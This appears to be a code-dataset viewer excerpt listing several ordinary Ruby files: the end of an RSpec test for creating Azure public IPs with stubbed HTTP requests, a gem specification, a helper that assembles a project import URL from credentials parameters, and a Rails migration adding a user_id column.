context 'when creating dynamic public ip' do
let(:public_ip_params) do
{
name: public_ip_name,
location: location,
idle_timeout_in_minutes: 4,
is_static: false
}
end
let(:fake_public_ip_request_body) do
{
'name' => public_ip_name,
'location' => location,
'properties' => {
'idleTimeoutInMinutes' => 4,
'publicIPAllocationMethod' => 'Dynamic'
}
}
end
it 'should create a public ip without error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, public_ip_uri).with(body: fake_public_ip_request_body).to_return(
status: 200,
body: '',
headers: {
'azure-asyncoperation' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect do
azure_client.create_public_ip(resource_group, public_ip_params)
end.not_to raise_error
end
end
context 'when creating public ip in a zone' do
let(:public_ip_params) do
{
name: public_ip_name,
location: location,
idle_timeout_in_minutes: 4,
is_static: false,
zone: 'fake-zone'
}
end
let(:fake_public_ip_request_body) do
{
'name' => public_ip_name,
'location' => location,
'properties' => {
'idleTimeoutInMinutes' => 4,
'publicIPAllocationMethod' => 'Static' # Standard SKUs require Static
},
'zones' => ['fake-zone'],
'sku' => { 'name' => 'Standard' }
}
end
it 'should create a public ip without error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, public_ip_uri).with(body: fake_public_ip_request_body).to_return(
status: 200,
body: '',
headers: {
'azure-asyncoperation' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect do
azure_client.create_public_ip(resource_group, public_ip_params)
end.not_to raise_error
end
end
end
end
end
| 31.247368 | 223 | 0.556847 |
e856acafe9465f45759751b1bc4c88cd20508be4 | 916 | lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "altria/processing_time/version"
Gem::Specification.new do |spec|
spec.name = "altria-processing_time"
spec.version = Altria::ProcessingTime::VERSION
spec.authors = ["Ryo Nakamura"]
spec.email = ["[email protected]"]
spec.summary = "Altria processing time chart plugin"
spec.homepage = "https://github.com/r7kamura/altria-processing_time"
spec.license = "MIT"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency "altria"
spec.add_dependency "chartkick"
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake"
end
| 38.166667 | 75 | 0.675764 |
28a3876810a57999ab904d05a7c5fb9e9fed4beb | 688 | # frozen_string_literal: true
module ImportUrlParams
def import_url_params
return {} unless params.dig(:project, :import_url).present?
{
import_url: import_params_to_full_url(params[:project]),
# We need to set import_type because attempting to retry an import by URL
# could leave a stale value around. This would erroneously cause an importer
# (e.g. import/export) to run.
import_type: 'git'
}
end
def import_params_to_full_url(params)
Gitlab::UrlSanitizer.new(
params[:import_url],
credentials: {
user: params[:import_url_user],
password: params[:import_url_password]
}
).full_url
end
end
| 26.461538 | 82 | 0.68314 |
f8a4c834e7e84f336fe421bb681c514008ad1dd4 | 131 | class AddUserIdToDiscussions < ActiveRecord::Migration[5.2]
def change
add_column :discussions, :user_id, :integer
end
end
| 21.833333 | 59 | 0.763359 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.